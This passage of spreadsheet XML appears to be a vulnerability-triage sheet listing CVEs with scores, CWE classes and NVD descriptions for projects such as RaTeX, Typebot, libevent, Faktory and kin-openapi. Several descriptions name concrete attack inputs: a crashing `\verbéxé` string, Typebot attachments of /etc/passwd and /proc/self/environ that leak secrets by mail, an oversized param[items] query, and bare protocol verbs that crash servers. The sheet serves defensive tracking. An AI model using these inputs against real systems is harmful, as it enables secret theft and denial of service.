      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>RaTeX is a KaTeX-compatible math rendering engine written in Rust. Prior to version 0.1.11, the public parser entrypoint `ratex_parser::parse(&amp;str)` panics on the 9-byte input `\verbéxé` (i.e. `\verb` followed by the non-ASCII delimiter `é`). When handling a `\verb` command, the parser slices the verbatim argument with byte indices (`arg[1..arg.len() - 1]`); if the delimiter character is multibyte UTF-8, index `1` lands inside that character and Rust panics with *“byte index 1 is not a char boundary”*. Because RaTeX’s release profile sets `panic = "abort"` (`Cargo.toml:48`), the panic aborts the entire process — not just the current request/thread — making this a hard denial of service for any service that renders untrusted LaTeX. Version 0.1.11 fixes the issue.</t>
        </is>
      </c>
      <c r="S223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53530</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53758</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr"/>
      <c r="Q224" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>Emlog is an open source website building system. In versions 2.6.29 and prior, article content is processed by Parsedown without enabling safe mode, which means raw HTML including &lt;script&gt; tags embedded in Markdown is passed through unescaped. The output is rendered with no additional sanitization, resulting in stored XSS visible to all site visitors. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53758</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53924</t>
        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr"/>
      <c r="Q225" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. Prior to 0xc9d4e0dacd937364793278180551e59d93cd43f9, StreamingEscrow.claim() correctly rejects withdrawals while an escrow is disputed, but the permissionless syncOutflow() path performs the same excess-balance transfer without checking disputed. After a streaming proposal is challenged, anyone can call syncOutflow() to transfer escrowed SuperTokens to the proposal beneficiary while the dispute is pending. If the proposal is later rejected, those tokens cannot be recovered by drainToStrategy(). This issue has been patched in 0xc9d4e0dacd937364793278180551e59d93cd43f9.</t>
        </is>
      </c>
      <c r="S225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53924</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55245</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr"/>
      <c r="Q226" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>Bifrost is an enterprise AI gateway for routing requests to model providers. Prior to 1.5.17, the isPublicIP function in core/providers/utils/fetch.go, reached through FetchAndEncodeURL for Bedrock and Vertex image or document URLs, classifies Carrier-Grade NAT 100.64.0.0/10, IPv6 6to4 2002::/16, NAT64 64:ff9b::/96 and 64:ff9b:1::/48, and deprecated IPv6 site-local fec0::/10 addresses as public. A remote attacker who controls a multimodal request URL can make the gateway fetch internal services, including a cloud instance metadata endpoint encoded through 6to4 or NAT64. This issue is fixed in version 1.5.17.</t>
        </is>
      </c>
      <c r="S226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55245</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55763</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr"/>
      <c r="Q227" s="5" t="inlineStr">
        <is>
          <t>CWE-841</t>
        </is>
      </c>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, processPercentageRoyaltiesTransfer in core/kapp/accounts/accounts.go calls SubFromBalance after the split loop and after the royaltiesToPay &lt;= 0 early return. computeSplitRoyalties rejects only when splitToPay &gt; royaltiesToPay, so a valid PercentTransferPercentage = 10000 split consumes exactly 100 percent of the royalty pool, sets royaltiesToPay to zero, and returns before the source account is debited. The split recipient receives the full royaltyAmount while the sender pays nothing and the supply counter is not updated, allowing unbounded off-the-books inflation of the transferred KDA. A KDA owner must configure a TransferPercentage royalty with a 100 percent split, after which any holder's transfer of the asset triggers the mint; the sibling processFixedRoyaltiesTransfer path is not affected because it debits the source before distribution. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55763</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55764</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr"/>
      <c r="Q228" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>Klever-Go is the Go implementation of the Klever blockchain protocol. Prior to 1.7.19, Klever-Go allows a mint-role holder to bypass a finite per-nonce MaxSupply on the semi-fungible token add-quantity path. In core/kapp/systemAccount/systemAcount.go, SFTAddCirculation performed meta.Circulation += amount before evaluating whether Circulation exceeded MaxSupply, without checking for signed int64 overflow. A large positive raw Amount supplied through processSemiFungibleAddQuantity in core/kapp/kda/mint.go can wrap Circulation negative, causing the signed maximum-supply comparison to pass and crediting approximately MaxInt64 units while corrupting the on-chain counter. The fungible path is not affected because its MintedValue &lt;= 0 guard detects the overflow. The correction uses the consensus activation flag FixMarketBuyOverflow. This issue is fixed in version 1.7.19.</t>
        </is>
      </c>
      <c r="S228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55764</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57445</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr"/>
      <c r="Q229" s="5" t="inlineStr">
        <is>
          <t>CWE-703</t>
        </is>
      </c>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>Gardens v2 is a modular governance framework that enables communities to create and manage multiple governance pools with customizable parameters and voting mechanisms. In dfba919e218e20d52db9f7b2e8d292d45a46c91b and prior, normal beneficiary payout paths in StreamingEscrow preserve depositAmount() while an active stream needs an escrow reserve. However, the approve-side dispute resolution path drains the whole available escrow balance to the proposal beneficiary. At time of publication, there are no publicly known patches.</t>
        </is>
      </c>
      <c r="S229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57445</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62865</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr"/>
      <c r="Q230" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-73</t>
        </is>
      </c>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>Typebot is an open-source chatbot builder. In self-hosted versions prior to 3.18.0, the server-side Send Email integration block allows arbitrary reading of local files on the server. The block builds Nodemailer attachments from a typebot variable, and its parseAttachments helper returns the supplied value as a filesystem path whenever it does not start with the application's own base URL, instead of requiring an http or https URL. The Nodemailer transport is created without disableFileAccess or disableUrlAccess, both of which default to false, so an attachment specified as an absolute server path is read from the local filesystem and delivered. Because both the attachment value and the recipient list are attacker-controllable typebot variables, any registered user can publish a bot whose Send Email block attaches an absolute path such as /etc/passwd or /proc/self/environ and mails it to an address they control. This enables reading any file the server process can access, including process environment secrets such as the credential encryption key and database connection string, without administrative privileges or victim interaction. Open signup is enabled by default and the system SMTP credential is already configured, so no non-default configuration is required. This issue is fixed in version 3.18.0.</t>
        </is>
      </c>
      <c r="S230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62865</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63383</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr"/>
      <c r="Q231" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent can read beyond a contiguous evbuffer region in event_tagging.c when decode_tag_internal requests at most five bytes from evbuffer_pullup but iterates using the full logical buffer length. A fragmented evbuffer containing a six-byte malformed tag can therefore advance past the pullup window and trigger an out-of-bounds read, which can crash a process that decodes attacker-controlled tagged RPC data. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63383</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63384</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr"/>
      <c r="Q232" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>Libevent is an event notification library. Prior to 2.1.13 and 2.2.2-alpha, libevent has an incorrect integer conversion in event_tagging.c when evtag_unmarshal_header uses evtag_decode_int to decode an attacker-controlled uint32 payload length and returns it as a signed int. Values above INT_MAX become negative or truncated, and evtag_unmarshal_string can use the converted value in allocation sizing, producing a wrapped large allocation request and denial of service. This issue is fixed in versions 2.1.13 and 2.2.2-alpha.</t>
        </is>
      </c>
      <c r="S232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63384</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63403</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr"/>
      <c r="Q233" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>Faktory is a language-agnostic background job server. In versions prior to 1.10.0, the server is vulnerable to an unauthenticated denial of service in which a single malformed command crashes the entire process. Its wire protocol is line-based, and several command handlers slice or index the received line at a fixed offset, such as cmd[5:] for PUSH or qs[0] for QUEUE, without checking that a payload is present. Sending a bare verb with no payload, for example PUSH, ACK, FAIL, BEAT, PUSHB, or QUEUE, triggers a Go slice or index out-of-range panic. Because the codebase has no recover() anywhere in the command-dispatch path, an unrecovered panic in a handler goroutine terminates the whole Go process rather than just that connection, instantly disconnecting every other client, worker, and in-flight job. The attack requires only a connection to the command port and completion of the trivial handshake, with no credentials when no password is configured, and can be repeated to keep the service down indefinitely. This issue is fixed in version 1.10.0.</t>
        </is>
      </c>
      <c r="S233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63403</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77120</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>cybersecurity@se.com</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr"/>
      <c r="Q234" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability exists that could cause privilege escalation to root and unauthorized execution of administrative functions when an authenticated user with SSH enabled interacts with the operating system console that improperly processes user-controlled input.</t>
        </is>
      </c>
      <c r="S234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77120</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77298</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr"/>
      <c r="Q235" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions 4.39 and earlier, the S3 API accepts an external OIDC JWT sent directly in the Authorization header and maps it to an IAM role without enforcing that role's trust policy, so a federated user can assume a role they are not permitted to hold. The standard STS AssumeRoleWithWebIdentity path rejects such a token when the role's trust policy does not trust the token's federated provider, but the direct S3 bearer path validates only the token itself and then authenticates as the mapped role and evaluates that role's attached S3 permissions. As a result, a valid OIDC user whose token would be denied the role through STS can obtain the role's S3 access, including object read, write, and delete, by presenting the raw OIDC JWT directly to the S3 API. This issue is fixed in version 4.40</t>
        </is>
      </c>
      <c r="S235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77298</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77354</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr"/>
      <c r="Q236" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>kin-openapi is a Go project for handling OpenAPI files. From 0.124.0 until 0.142.0, openapi3filter.sliceMapToSlice in openapi3filter/req_resp_decoder.go converts attacker-controlled sparse indexes from a deepObject query parameter into a dense slice by allocating entries from zero through the largest supplied index, after which buildResObj creates another slice of the same length. This allocation occurs before schema validation, so maxItems does not prevent it. An unauthenticated client can send a small query such as param[items][50000000]=x to an endpoint whose deepObject schema contains an array, forcing multi-gigabyte heap allocation and causing an OOM kill or restart loop. Other request-body encodings and styled parameters that do not produce bracketed integer indexes are not affected. This issue is fixed in version 0.142.0.</t>
        </is>
      </c>
      <c r="S236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77354</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77357</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr"/>
      <c r="Q237" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-834</t>
        </is>
      </c>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>Mesop is a Python-based UI framework that allows users to build web applications. Prior to 1.3.3, applications running in debug mode expose a GET /hot-reload endpoint whose unbounded loop depends on the user-supplied counter parameter, allowing an unauthenticated attacker to hold worker threads with high counter values until the worker pool is exhausted and the server becomes unavailable. A single unauthenticated attacker can crash the Mesop server with minimal effort. Because the attack leverages worker exhaustion, the server remains unresponsive until it is manually restarted. This issue is fixed in version 1.3.3.</t>
        </is>
      </c>
      <c r="S237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77357</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79756</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="n">
        <v>0.051</v>
